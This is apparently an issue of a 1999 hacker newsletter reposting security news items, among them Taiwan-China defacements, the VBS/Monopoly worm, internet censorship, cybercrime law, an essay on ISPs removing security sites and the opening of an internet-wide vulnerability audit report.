This isn't a new phenomenon. Indeed, in a 1998 report, the U.S. General Accounting Office
chastised many government agencies for leaving holes in their information security defenses.
@HWA
20.0 Taiwan Strikes back at China via Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Albert
In response to recent attacks on various Taiwan
government web sites some Taiwanese individuals are
attacking web sites in mainland China.
Excite News
http://news.excite.com/news/r/990810/08/net-china-hacker
Taiwan Cyber-Hackers Strike Back At China
Updated 8:38 AM ET August 10, 1999
TAIPEI (Reuters) - Taiwan may be dwarfed by its saber-rattling rival, mainland China, but it has shown it is not to be trifled
with on at least one battleground -- cyberspace.
Hackers from the computer-savvy island have inserted pro-Taiwan messages into several Communist Chinese government Web
sites in retaliation for a similar attack on Taiwan government sites by a mainland Chinese hacker.
The web attacks sparked concern from military authorities who said an Internet war could add to already simmering tension
over Taiwan's drive for equal status with the mainland.
Taiwan news media reported Tuesday that several local hackers had succeeded in inserting Taiwan's flag, a sound file that
played its national anthem and pictures of Taiwan presidential candidates on mainland Chinese Web sites.
Statements like "Counter the Chinese Communists," "Taiwan does not belong to China" and "Seriously, Taiwan is better" also
popped up on some of the sites.
The hackers from Taiwan, which makes many of the world's computers, were also believed responsible for a revolving image of
the Japanese cartoon figure Hello Kitty on one Web site.
The hackers struck after a weekend attack on official Taiwan sites by a person claiming to be from mainland China, who
inserted messages such as "Only one China exists and only one China is needed."
The mainland hacker was apparently angered by Taiwan President Lee Teng-hui's call for "special state-to-state" ties between
Taiwan and China, something Beijing has furiously condemned and threatened to punish with military action.
Beijing views Taiwan as a wayward province and vows to bring it under mainland rule.
@HWA
21.0 Monopoly Virus Taunts Bill Gates and Microsoft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by nvirB
A new Melissa like virus called VBS/Monopoly uses a
picture of Bill Gates and a Monopoly board to taunt the
giant company. The virus uses the Melissa like tactic of
sending itself to entries inside your address book but so
far has not become wide spread. It also sends a wide
variety of information about the infected computer to
numerous other email addresses.
MSNBC
http://www.msnbc.com/news/299142.asp
Monopoly virus taunts Microsoft
Another Melissa-like work, this one could spread quickly but hasn�t yet been
discovered in the wild
By Bob Sullivan
MSNBC
Aug. 10 � There�s a new Melissa-like computer
virus that not only attacks Microsoft software, it
taunts the software giant�s leader. The so-called
VBS/Monopoly virus pops up a dialog box that
says, �Bill Gates is guilty of monopoly. Here is
the proof. :-)� and then displays a picture of
Gates superimposed on a Monopoly game board.
It also sends itself to every e-mail in the victim�s
address book. But anti-virus firms say the virus
is not yet spreading widely around the Internet.
NOTICE OF THE VIRUS WAS apparently first
posted by a Russian anti-virus lab, Kaspersky Labs AVP,
on Monday.
(Microsoft is a partner in MSNBC.)
Like Melissa, it arrives to victims as an e-mail
attachment to a note. The subject line on the e-mail is �Bill
Gates joke.� But unlike Melissa, anti-virus companies have
been alerted to it before it was able to spread, so it won�t
likely have Melissa-like widespread impact.
Users who don�t double-click on the attachment, which
is named MONOPOLY.VBS, cannot be infected. The .vbs
extension indicates that the program is written in Microsoft�s
Visual Basic scripting language. According to Dan Takata
of Data Fellows, programs written with VBScript operate
only under Windows 98 and Windows 2000 (unless
Windows Scripting Host has been installed separately).
Along with displaying the image of Gates, the
worm/virus sends itself to every e-mail in the victim�s
Outlook address book.
It also collects information about the victim, including
registered user name and organization, network computer
name, country and area code, language, Windows version
and Internet Explorer start page. It sends that information to
a variety of e-mail addresses, probably to be accessed later
by the virus author.
But the virus has not been detected �in the wild,�
according to anti-virus companies.
�It�s still a zoo virus,� said Network Associates� Tony
Wells, meaning at the moment no victims have been
identified, and the program has been confined to anti-virus
laboratories. �We�re classifying it as a low risk.� Wells said
Network Associates� anti-virus products have been
updated to protect customers from the virus.
@HWA
22.0 FBI fingerprint database now online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by pigeon
Officials in 15 states can now submit fingerprints to an
online database to look for possible matches. The
database, known as the Integrated Automated
Fingerprint Identification System, which cost $640
million, contains the fingerprints of 34 million people.
Searches now take two hours instead of 15 days. All 50
states will eventually be connected to this system.
Nando Times
http://www.nandotimes.com/technology/story/0,1643,80191-126589-888747-0,00.html
FBI touts online fingerprint database
Copyright � 1999 Nando Media
Copyright � 1999 Associated Press
From Time to Time: Nando's in-depth look at the 20th century.
By VICKI SMITH
CLARKSBURG, W.Va. (August 10, 1999 6:58 a.m. EDT http://www.nandotimes.com) - A $640 million
electronic database of fingerprints will help police nationwide decide within two hours whether
a suspect should be freed on bail or held in custody, FBI officials say.
Instead of waiting more than 20 days for critical information, judges and law enforcement
agencies in 15 states now can uncover a suspect's identity and criminal history before leaving
the courthouse.
All 50 states are expected to be connected within the next few years.
The new Integrated Automated Fingerprint Identification System, which began operating July
28, was expected to be dedicated by FBI Director Louis Freeh on Wednesday at the FBI's
Criminal Justice Information Services center in Clarksburg.
It reduces to electronic data some 34 million fingerprint cards, the equivalent of 18 stacks as
tall as New York's Empire State Building.
It also slashes the wait for civil background checks from more than three months to just 24
hours, said James DeSarno, assistant director in charge of the Criminal Justice Information
Services Division.
@HWA
23.0 45 Named as Enemies of the Internet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by deepquest
45 nations have been named Enemies of the Internet by
Reporters Sans Frontieres (RSF). The report lists
countries it claims have blocked, filtered or all-out
banned sections of the Internet. Some of the countries
mentioned in the report where Azerbaijan, Kazakhstan,
Burma, China, Cuba, Iran, Iraq, Libya, North Korea,
Saudi Arabia, Sudan, Syria, Tunisia and Vietnam.
Yahoo Asia News
http://asia.yahoo.com/headlines/100899/technology/934254300-134601.html
PARIS, FRANCE, 1999 AUG 9 (NB) <br> By Martyn Williams, Newsbytes.
new report by Reporters Sans Frontieres (RSF) has named 45 nations
the group considers enemies of the Internet for the blocking and
filtering or all-out banning the nations impose on Internet access.
Of the 45 nations, RSF said 20 can be described as real enemies of
the Internet for their actions. They are: the countries of Central
Asia and the Caucasus (Azerbaijan, Kazakhstan, Kirghizia, Tajikistan,
Turkmenistan and Uzbekistan), Belarus, Burma, China, Cuba, Iran, Iraq,
Libya, North Korea, Saudi Arabia, Sierra Leone, Sudan, Syria, Tunisia
and Vietnam.
Many of the 20 nations are singled out for restrictions that make
all Internet users access the network through a single, state-run
ISP. These nations include Belarus, the nations of Central Asia, Sudan
and Tunisia.
China was singled out for its close monitoring of Internet use despite
the rapid pace with which Internet use is growing. RSF singled out
the case of computer technician Lin Hai, who was jailed for supplying
Chinese e-mail addresses to a US-based dissident site that publishes
an e-mail newsletter critical of the government, and the June closure
of 300 unlicensed cybercafes in Shanghai.
The group also highlighted China's periodic blocking of the Websites
of dissident organizations and international news organizations
including BBC Online and New Century Net.
Other nations were taken to task for government-controlled filtering
of the Internet which means, according to RSF, medical students in
Iran are unable to access Websites dealing with anatomy and surfing
via any of Saudi Arabia's private ISPs run through government filters
that seek to maintain Islamic values.
However, the situation is even worse in other countries.
In Burma, said RSF, Internet access is via a state-run ISP and anyone
who owns a computer must declare it to the government or face the
possibility of a 15 jail sentence if the machine is discovered.
Restrictions in Vietnam mean all Internet use has to be approved by
the government through permits from the interior ministry and access
via state-run ISPs.
Journalists working for an online newspaper in Sierra Leone have been
attacked, said RSF, with two from the daily The Independent Observer
being arrested in June after accusations that they were working with
the foreign based online newspaper Ninjas.
And citizens of Iraq, Libya, North Korea and Syria have no direct
access to the Internet and even the official sites of the governments
of these countries are maintained on servers overseas. In the case
of Iraq, the few official servers are in Jordan while the North Korean
news agency maintains its site from Tokyo.
Concluding its report, RSF called on the governments of the 20 nations
to abolish the state monopoly on Internet access, the obligation on
citizens to register before obtaining access, censorship through the
use of filters, to lift controls on e-mail and enable more privacy
online and to call off Internet-related legal proceedings.
It also called on Burma, China, Cuba, Kazakhstan, Saudi Arabia and
Tajikistan to ratify and enforce the International Covenant on Civil
and Political Rights, Article 19 of which stipulates that "everyone
shall have the right (...) to receive and impart information and ideas
of all kinds, regardless of frontiers (...)".
<p>The covenant has been signed by a number of the 20 nations singled
out in the report and RSF asked those countries to respect the contents
of Article 19. Those countries include Azerbaijan, Belarus, Iran,
Iraq, Kazakhstan, Kirghizia, Libya, North Korea, Uzbekistan, Sierra
Leone, Sudan, Syria, Tunisia and Vietnam.
@HWA
24.0 Alliance Z3 Defaces Spanish Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Lionel
Yesterday (Wednesday), a group known as 'Alliance Z3',
defaced the Spanish presidency's web site and left
comments critical of the government. A government
spokesperson admitted that the site was broken into,
and that the original page has been restored.
Yahoo News - French
http://www.yahoo.fr/actualite/19990811/multimedia/934372020-yaho193.110899.134747.html
25.0 Government has a Hard Time with Bureaucracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evilwench
A little intrigue, some misdirected governments funds,
just what has been going on with government network
security anyway? FIDNet has been proposed but is now
facing opposition, which looks very similar to what
happened with Defensewide Information Systems
Security Program (DISSP) back in 1996. So what
happened? Where did the money go? Then last year
there was Defensewide Information Assurance Program
(DIAP) which also failed. Now FIDNet looks like it to will
fail. Just what the hell is going on?
Network World Fusion - Registration May be Required (It's worth it though)
http://www.nwfusion.com/cgi-bin/go2.cgi?url=/news/1999/0802feat.html&uid=656d61696c
(I hate subscription services)
26.0 Law Not a Substitute for Good Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evilwench
Former federal prosecutor, Mark Rasch, says that while
current cybercrime laws are extremely broad and could
possibly be interpreted in such a way that makes most
internet users criminals, businesses should still invest
heavily on network security.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2312779,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Never a cop when you need one
By David Raikow, Sm@rt Reseller
August 11, 1999 10:46 AM PT
URL: http://www.zdnet.com:80/zdnn/stories/news/0,4586,2312779,00.html
In his keynote address at the WebSec security conference on Tuesday, former federal prosecutor
Mark Rasch outlined one more rationale for a robust and comprehensive corporate security
policy. If you're not prepared to respond to a system intrusion entirely in-house, you may be even
less ready to deal with the consequences of going to the authorities for help, he warned.
Rasch, who was responsible for the prosecution of Robert Morris and the investigations of Kevin
Mitnick and the "Cuckoo's Egg" hackers, described a legal system struggling to keep up with new
technology and failing.
In an attempt to address threats real and perceived, Congress has passed extraordinarily broad
cybercrime laws, giving prosecutors enormous discretion, Rasch claimed.
We're all felons
"We have enacted new statutes that make felons of us all," said Rasch. "If you've e-mailed your
cousin from the office, you're probably a felon."
While law enforcement agencies aren't likely to bother with the average violation of corporate
e-mail policy, their priorities are no more likely to match most users'.
Most IS shops probably would hope to chase intruders off as quickly and quietly as possible while
minimizing the damages. But the FBI, according to Rasch, is probably more interested in a
high-profile conviction and may want to prolong an intrusion in order to collect evidence.
The legal impact of a security breach may fall even more heavily on corporations than on the guilty
party. An intruder using a company's servers to strike at other machines, for example, could leave
that company exposed to "downstream liability" in civil court.
And certainly a solvent corporation will present a more attractive defendant in such cases than the
average cracker, he said.
Rasch laid out a situation in which an employee had used corporate servers to acquire and
distribute pirated software. The business, which had unknowingly been using some of this
software, was potentially subject to millions of dollars in fines.
Law is a 'blunt instrument'
Rasch emphasized that it may be essential to notify the authorities after a breach, particularly as it
may be required by law. Government agencies also have assets--subpoena powers, investigative
resources--that may be necessary to adequately respond to an attack.
The key is to have an established plan for addressing these concerns so that employees are not
forced to make ad-hoc decisions in the heat of the moment, he said.
"Law is a blunt instrument to use against cybercrime," Rasch concluded, "You should know what
you're doing before you try."
@HWA
27.0 Network-centric Warfare to be Used by Military
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Code Kid
The San Jose Mercury News has an interesting interview
with Vice Adm. Arthur K. Cebrowski, president of the
Naval War College in Newport, R.I., on what he
describes as network-centric warfare and how the
armed forces are adapting to it.
San Jose Mercury News
http://www.sjmercury.com/svtech/news/indepth/docs/qa081199.htm
Posted at 10:29 p.m. PDT Tuesday, August 10, 1999
Armed forces are adapting to
network-centric warfare
Vice Adm. Arthur K. Cebrowski, described as the U.S. Navy's computer guru, is
president of the Naval War College in Newport, R.I., and instrumental in addressing
military needs in the information age. Cebrowski outlined his ideas on network-centric
warfare, which aims to link the Navy's resources -- from personnel to weapons --
through a computer network, Tuesday at the Naval Postgraduate School in Monterey.
Prior to the speech, Cebrowski spoke with Mercury News Staff Writer Shashank
Bengali. This is an edited transcript of their conversation:
Q Where did the concept of network-centric warfare come from?
A - It is the military's response to the information age. We can have well-informed soldiers and sailors and marines out there in the
field but operating according to military principles that help organize their behavior. Forces will self-synchronize themselves from
the bottom up, attaining a degree of efficiency and effectiveness that hasn't been possible before.
Q - And you're able to coordinate forces over wide geographic areas as well?
A - Yes. Just as in the information age, technology has changed the importance of territory and geography, you find the same thing
in the military enterprise. That's why you see so much these days about striking targets from widely dispersed forces. So
network-centric warfare derives its power from well-informed but geographically dispersed forces that have a high degree of
shared awareness.
Q - Do you think the military has lagged behind the rest of the world in implementing networking technology?
A - There's a famous old Roman saying that the military walks in step with society but several paces back. And part of that is
because the military is responsible for securing the most fundamental interests of the state; that is, the security of the people. And
consequently, it tends to be strategically risk-averse. So before the military will make a dramatic shift, it will look for some very
good evidence. We believe that that evidence is not only at hand, but that it's obvious, and the military is making that adjustment.
Q - How much will you have to overhaul, or at least, shift, your personnel to accommodate these changes?
A - One of the things that happens when there's a shift as great as this is that different skills are valued in different ways. And what
you're seeing is a revaluing upward of those personnel who have facility in information tech broadly, both on the communication
and executing side. It's also true in information-gathering, or what we call the ``sensing'' side. This is not just in war fighting, but it
extends to everything we do. The secretary of the Navy divides its concerns into three areas: how we live, how we work and
how we fight. We've been vigorously applying it at all three of those levels.
Q - Give a few examples of how this has affected how you fight.
A - Well, we've spent a considerable amount of money on what we call the IT21 program, Information Technology for the 21st
century. What it is, is high-quality information exchange capability that is in our combat ships. We use it for the exchange of vital
warfare information. If you look at how the operations were run in Kosovo, we don't have high-level meetings anymore, what
we have is high-level collaborations with people at dispersed locations. The IT21 program allows us to do that from ships at sea.
At the tactical level, we share information to bring combat power to bear via very high-quality data links, and that's the system by
which we commit weapons and move forces.
Q - How much has all this cost?
A - It's been expensive (more than $1 billion over the last few years). However, the return on the investment has been enormous.
And of course we don't measure return on investment the way stockholders do, we measure it in terms of increased combat
power, and that's become very obvious to us.
Q - What have been the changes in the third aspect, the way you live?
A - We have wonderful experiences from our sailors deployed around the world, gone from home for extended periods of time,
and now they are connected to their families on a daily basis. You have mitigated the great sense of loneliness. And, in fact,
we've found that the retention rates among our sailors who are deployed in this modern technological environment are in fact
higher than in the ships where we haven't been able to implement that kind of environment yet.
Q - What kind of access do the sailors have to the technology?
A - A few years ago, we deployed our first ship that had the capability of sending e-mail. We were so excited about that, that we
actually counted the number of e-mails sent, and the number grew into the thousands. The Enterprise battle group recently
returned from a long deployment, and they stopped counting e-mails past 5 million. It's no longer considered a novelty, it's just a
fact of life.
Q - How far along are you in implementing this across the Navy?
A - By the end of 2001, we will have implemented the Navy-Marine Corps intranet. By the end of 2003, all of the ships in the
Navy will have a very robust IT capability.
Q - How did the previous system compare to what you're trying to put in now?
A - It's not even a matter of saying it was a system. What you really had was a collection of capabilities that lacked
standardization, interoperability, capacity. For example, one of the great concerns in combat is what's euphemistically called
``friendly fire'' (when an armed force accidentally kills one of its own). Of course, we don't like friendly fire. And information
technology in the form of modern tactical data links (is) one of the most important tools to suppressing friendly fire. That's just
one of the places where in our studies and in our war games, we can see the payoffs of information technology.
Q - How much have things changed since the last all-out war in the Persian Gulf?
A - The Persian Gulf War, looking back, quite frankly looks quite a bit like the Stone Age. I was commanding the USS Midway,
where we had two telephones with off-ship capability. And it's hard to imagine that today. Some of our aircraft carriers have a
thousand seats (for communicating). The quality of planning can go up a great deal, and you can plan much faster. For example,
to put together a plan for fleet movement, a major evolution would frequently take a day or two. Now that kind of planning is
done in an hour or even less. It's no longer plan, then execute -- it's plan while executing.
Q - And the billion-dollar question: Are these systems ready for Y2K?
A - I don't think we'll have a hiccup in Y2K as far as military systems.
Contact Shashank Bengali at sbengali@sjmercury.com or (408) 920-5066.
@HWA
28.0 Gateway plans for Amiga
~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by M1r0rB4lls
Gateway is finnally doing something with the 47 Amiga
patents it bought several years ago. They aren't
planning on introducing a new PC but instead want to
use the technology to create info appliances.
MSNBC
http://www.msnbc.com/news/299752.asp
Gateway to revive Amiga
for information appliances
By Gary McWilliams
THE WALL STREET JOURNAL
Aug. 12 � Two years ago, PC maker Gateway Inc.
acquired the rights to the personal-computer
industry�s most famous cult product, the Amiga
PC. The Amiga made its debut in 1985, and still
has fans, partly as a result of a James Dean-like
history: a rapid rise, then a tragic end.
GATEWAY PAID ABOUT $13 MILLION for 47
Amiga patents, including those for important multimedia
techniques. The San Diego PC maker�s original plan was to
use the patents as a bargaining chip in royalty negotiations
with other PC makers. �It was a treasure chest,� says Joe
Torre, a former Amiga Inc. hardware engineer.
Now, Gateway is aiming to revive the Amiga in a bold
move to set standards for the next era in computing. It
quietly has set up and staffed a new Amiga Inc. subsidiary
to cobble together low-cost �information appliances� for the
Internet, based on Amiga technology, that can be linked like
home-stereo components to add features.
�There�s a new computer revolution on the horizon that
has to do with making computers a natural part of everyday
life,� says James Collas, the Amiga unit�s president and a
former Gateway executive. He says the unit will craft
everything from digital-music players and game machines to
wireless tablets that link to the Internet. Its first products
could arrive early next year and be priced from about $100
for game players to $1,000 for PC servers.
Gateway will pit its tiny subsidiary against PC kingpins
such as Microsoft Corp. and consumer-electronics
companies such as Sony Corp. and Philips Electronics NV,
which also are developing new-age information devices.
Mr. Collas says Amiga will license its designs to
consumer-electronics makers to promote technologies that
can be embraced far beyond its parent.
It could use all the help he can muster. Early entrants in
the computer-consumer electronics convergence market,
such as WebTV, were gobbled up quickly by the giants
(Microsoft bought WebTV). Even for a company with $7.5
billion in sales, the risks are high for Gateway. �It�s
becoming a battle for the big boys,� says Sean Kaldor, a
researcher at International Data Corp.
How much of the new Amiga will come from its past
isn�t known. Mr. Collas has recruited designers from
Amiga�s heyday along with software specialists from Silicon
Graphics Inc. and Apple Computer Inc. Amiga, he says,
will operate independently from its parent, and be free to
strike its own agreements. Mr. Collas wouldn�t say if
Gateway plans to spin off the subsidiary. A Gateway
spokesman declined to comment.
Among the San Diego division�s first products will be a
new Amiga PC that Mr. Collas says is aimed to bring
Amiga PC software writers back into the fold. Next week,
the company plans to release a new version of the Amiga
operating system that provides access to the Internet.
The Amiga is nothing if not resilient. It first appeared 14
years ago as a spunky alternative to the IBM PC and
Apple�s Macintosh. Graphics and film enthusiasts flocked to
the machine because of its ability to handle video and
sound. Commodore Electronics Ltd. sold five million of the
low-cost machines before the company�s sudden demise.
Even today, Hollywood animators and filmmakers still use
the machines for generating special effects.
Amiga went into decline after Commodore filed for
bankruptcy in 1994, and stopped making the machines. The
first attempt to resurrect Amiga came in 1995, when
German computer maker Escom AG acquired the
Commodore patents in a bidding contest with Dell
Computer Corp. But, like Commodore, Escom filed for
bankruptcy a year later, and manufacturing was halted
again. Amiga devotees became scavengers, scouring online
bulletin boards for used machines and add-on parts.
Indeed, there are dozens of tiny companies still living off the
Amiga accessory market.
If the new Amiga ever catches on, it will be an Amiga
in name only for some of the machine�s original devotees.
Greg Scott, an Amiga fan who manages the computer
systems for Archtech Inc., a computer firm in London,
Ontario, says Gateway�s plan to develop the
next-generation Amiga PC using the free Linux operating
software has raised the hackles of fans of the old Amiga.
�It�s nothing new,� he says.
Jason Compton, who owns an Amiga and once ran an
online Amiga magazine, still believes nothing can match the
original. �I�ve never seen a PC I�ve enjoyed more.� He says
the Gateway plan does little more than resurrect the Amiga
name. �As far as I can tell, there�s no connection� to the
original technology, he says.
Mr. Collas says such qualms are missing the spirit of
the old Amiga. It isn�t new technology that�s needed so
much as an innovative blending of existing technologies, he
insists. Just as the Amiga PC�s low cost and ease of use
allowed owners to do multimedia work years ahead of the
IBM PC, he says the new Amiga �will bring the information
age to the common person.�
Copyright � 1999 Dow Jones & Company, Inc.
All Rights Reserved.
@HWA
29.0 Mitnick Moved to County Jail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by ryan
In a swiftly executed move Kevin Mitnick has been
moved from the Metropolitan Detention Center - Los
Angeles, to the San Bernardino County Jail.
Unfortunately the SBC does not offer Kosher meals,
since Kevin wishes to exercise his right to freedom of
religion he has not eaten since his transfer late
Wednesday afternoon. The defense lawyers will file a
motion with the court for Kevin's immediate return to
MDC-L.A. The SBC does allow visitors as long as 24
hours notice is given.
FREE KEVIN
http://www.freekevin.com
@HWA
30.0 The problem with ISP's and security sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by CyberChrist
A simple email and a site disappears, maybe it was
never there to begin with? ISPs with missing back
bones, maybe they never had them? What is going on?
Where have all the good security sites gone?
Buffer Overflow
http://www.hackernews.com/orig/buffero.html
Not found-- the problem with ISPs
and security web sites
CyberChrist
cc@h0use.org
"Sapere Aude"
Over the last few months, there have been a rash of
security-related web sites taken offline for a peculiar
reason-- It seems that Internet Service Providers cave in
to the demands of people objecting to the content of the
site, or at times, the alledged content. Sites such as
Packetstorm Security have been victim of people claiming
that material that is posted on the web site is libelous and
try to hold the service provider of the web site, such as
the web hosting organization, for ransom by threatening
them with lawsuits if they do not force the webmaster to
change the content. Companies are more willing to just
toss the offending site off of its servers and avoid any
kind of threat of a lawsuit. However, this is not the way
to deal with this problem, as there have been precedents
set in American courts that deal specifically with these
issues.
First, let's examine a bit as to how a "security expert" or a
"hacker" is viewed by a typical ISP. Most ISPs have a
service agreement, where one agrees to abide by their
rules. These rules often lay out the rules as to what
content is acceptable and not acceptable. Many of these
ISPs forbid the posting of security information on their
web servers, lumping "hacking" in with "pornography" and
other perceived underground activities. This lumping of
hacking with other, seedier activities is prevalent and is
part of the problem. No matter what the credentials are of
the person that is constructing the web site and no
matter what his stated intentions are, and no matter how
many disclaimers are posted on the site, web hosting
companies and ISPs generally frown upon that kind of
content. So part of the problem is that ISPs and web
hosting companies are generally undereducated about the
entire hacker culture, their brains fattened by the massive
FUD articles posted in the media.
In their minds, security consultants==hackers=bad.
This leads to another problem-- there is always going to
be someone out there that is jealous or mad about the
content of another web site. The site may contain
information such as "xyz said this and xyz is wrong and
this is why." Sites such as these either start posting
about each other, or worse, one webmaster just gets fed
up with it and contacts someone that they feel can
remedy the situation. Often this person forgets about the
chain of command as far as reporting questionable
material and goes straight for the throat by contacting
the web site's upstream provider. This is becoming an
increasing problem and the problem again lies in the fact
that many of these fly-by-night web masters were not
around during the infancy of the Internet (no, that does
not mean that the infancy was when then web got
started). There ARE rules of engagement and chains of
command, and these have been outlined since the early
80s and perhaps beyond, both in the form of RFCs and
tradition. The way that complaints used to be handled are
roughly as follows:
- send email to the system administrator of the offending
system, calmly explaining the situation and maybe offer
some evidence as to how this is causing harm. This could
be due to content or due to other activity coming from
the site, such as port scanning. Attaching logs usually
helps a lot.
- if you don't get a response in a reasonable amount of
time, try re-sending the email. It may seem hard to
believe, but sometimes mail gets lost.
- if there is still no response, try doing a 'whois' on their
domain name, and then try contacting them via the
information provided. Usually you get names and
telephone numbers and addresses at this point.
- it is only when you have exhausted all of these
measures and are getting no cooperation or hostile
responses that you try to contact the upstream service
provider. To find out who their upstream service provider
is, try looking at the nameservers that are registered for
the domain in the 'whois' command or try doing a
traceroute and seeing who they have their connection
from.
This is really common sense more than anything. Common
sense apparently has gone out the window in the
point-and-click world of the 1990s.
The last part of the puzzle is what happens when these
two uneducated sides get together to decide what to do
about someone that seems to know more than they do.
More often than not, what happens is the illogical in that
the offending party is tossed off the system or his
upstream provider threatens to shut down the service.
The cycle usually goes like this:
- siteA.com posts information that shows that information
by lamerA is wrong. siteA.com pokes fun at him, generally
ridicules him, and the cycle usually renews itself when
lamerA says something else stupid (or publishes an idiotic
book).
- lamerA feels stung by all these statements and usually
responds with weak defenses. Finally, the whole thing
becomes unbearable and in the search of trying to get the
activity to stop, he dashes to siteA.com's service provider
and tells them that siteA.com has libelous material. lamerA
threatens the service provider with a lawsuit or
thereabouts.
- siteA.com's provider panicks, as they do not wish to be
sued for libel (awards for this are usually extravagant and
ISPs barely break even as it is). So they either remove
the site or forcibly remove the content and sends stern
rebukes to siteA.com's administrator/user.
There are a lot of problems with this cycle. Obviously the
chain of command is broken. But more importantly, due to
lack of education on the ISP's part, they are not aware
that U.S. courts have decided that ISPs are NOT liable for
the content of its users. In November of 1998, The United
States Court of Appeals in Florida ruled against a woman
who sued America Online when one of its subscribers, a
convicted sex offender, approached her 11-year-old son
via an America Online chat group. The appeals court
upheld a federal law that protects Internet service
providers and online services from inappropriate online
transmittals by subscribers. The verdict is being appealed
to the United States Supreme Court. This decision also
extends to web content. Rather than cite the case to the
accuser, the service provider usually caves in quickly and
pulls the plug.
There are many other cases that ISPs can cite in their
defense. Zeran vs. America Online in 1998 was upheld by
the U.S. Supreme Court. It stated simply that ISPs such
as America Online are free from liabilitynover material that
is carried on their network. Furthermore, the Supreme
Court stated that ISPs do not have a duty nor an
obligation to remove material found to be offensive. The
decision cited the Communications Decency Act of 1996,
where ISPs are shown not to be publishers and thus are
not treated as such by the law.
Another case is Cubby vs. Compuserve. In this case, the
ruling cleared CompuServe of any wrongdoing based on
the content of one of its subscribers, stating that ISPs
such as CompuServe are secondary publishers, merely
providing the means by which documents may be viewed
and had no editorial control over any of the content
published on its public web servers. At the most, it
removes any kind of offensive material after conplaints.
Hence, it cannot be held liable for content since it had no
previous knowledge of the content.
Interestingly enough, one of the key elements that can
help protect security consultants from being run off from a
service provider or that can help a service provider to deal
with complaints is the Communications Decency Act of
1996. It contains clear language that clearly states that
"no provider or user of an interactive computer service
shall be treated as a publisher or speaker of any
information provided by another." The key is to realize
that as a service provider being threatened with lawsuits
over content that is found to be defamatory, your
company is NOT liable for the content being published by
one of your users. That is the law of the land and by
citing these cases to any irate callers, you may be able to
diffuse the situation in a more diplomatic manner than just
booting the offending site off your server or off your
router. Remember that these laws also theoretically work
in inverse-- if you boot users from your system without
warning and you state that the material could get the ISP
sued, you could be sued by the user you just booted for
wrongful termination. And if the user can show loss of
business over this wrongful termination, the ISP could
have more problems in its hands than it bargained for.
I should be noticed that although ISPs cannot be held
liable, users of the system that are publishing the
questionable information CAN be held liable. However, a
clear case must be made in court to show that the
information is erroneous and has caused emotional and
financial distress to the plaintiff.
In conclusion, it has been shown that the problems that
arise in today's trend of booting "questionable" security
sites from servers or from routers arises mainly from a
complete lack of education on all sides as to the way that
these problems are to be approached. The problems are
not only in the complete diregard of the
chain-of-command in reporting a problem, but ultimately
also lies in the total lack of education on the part of the
ISP in knowing what its rights are as defined by the
American Judicial System. ISPs of any kind seem quick to
cave in to the demands of an irate complaint and do not
seem to fully think of the situation at hand and think of
the legal precedents of these kinds of complaints without
executing a rash decision that does nothing but give other
would-be-complainers hope that they can also get a web
site or web server removed if they complain long enough
to their provider. If the rash of sites being taken down by
these uneducated people is to stop, then all sides need to
be aware of the protocols that are involved in dealing with
these problems and the legal cases that support their
decisions.
-- CyberChrist cc@h0use.org
"Sapere Aude"
@HWA
31.0 The Internet Auditing Project
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Aleph One
Security Focus has posted a very interesting report in
their guest forum section. The folks at SSR went and
scanned 36 million IPs, that was about 85% of the
internet at the time, for 18 common security
vulnerabilities. They came up with some rather scary
results. The article also introduces the idea of the
International Digital Defense Network (IDDN), a possible
public interest project which, if implemented, could
dramatically influence the security of the Internet. This
is a must read for anyone even remotely interesting in
system security.
Security Focus
http://www.securityfocus.com/templates/forum_message.html?forum=2&head=32&id=32
The Internet Auditing Project
by Liraz Siri <liraz@bigfoot.com>
Wed Aug 11 1999
Download the BASS scanner source code.
Introduction
Today, when too many people think of security on the Internet, they think of individual hosts and networks. Alone. Got a problem?
Damn! Must be those damn hacker punks. Again. Keep it to yourself. Call the Feds, call the New York Times. Make sure we don't get
it. Didn't keep your systems patched? Moron. Don't make us sue you.
With the growing irrelevance of security organizations like CERT and law enforcement on the Internet, an ever growing number of
attacks are handled in isolation.
Hundreds of millions of Internet users around the world have become accustomed to an Internet beyond boundaries. One site flows to
the next, a jungle of software, protocols, media and people connecting, signal, noise, mixing, evolving, together.
It seems silly to ignore the security of the system _as a whole_, but we still do. A helpful analogy might be to consider the Internet
more a living organism than a neighborhood. A security compromise is can behave more like a disease then a "break-in". It is often
contagious and can spread. Remotely exploitable security vulnerabilities are like the natural wounds of the skin. They are relatively
rare, sometimes difficult to squirm through, but once inside, infection can begin.
This article describes the efforts of a small, independent, security research group to audit some 36 million hosts connected to the
Internet, for commonly known security vulnerabilities in an unfocused low-res scan.
Why?
Because we're a curious bunch, because we've been speculating (rather academicly) over the results for several years, and of
course, because we can.
Why are we publishing now, Why haven't we published before?
We know other groups, working for everyone from the UKUSA SIGINT agencies, foreign intelligence, private corporations and
organized crime are not likely, for many obvious reasons, to disclose any "privileged information" to the general public. We feel this is
not A Good Thing, and would like to do what we can to help level the playing field. We don't have any money, resources or academic
prestige to back us up, but we do have a few, humble insights to share, and we hope these can speak for themselves.
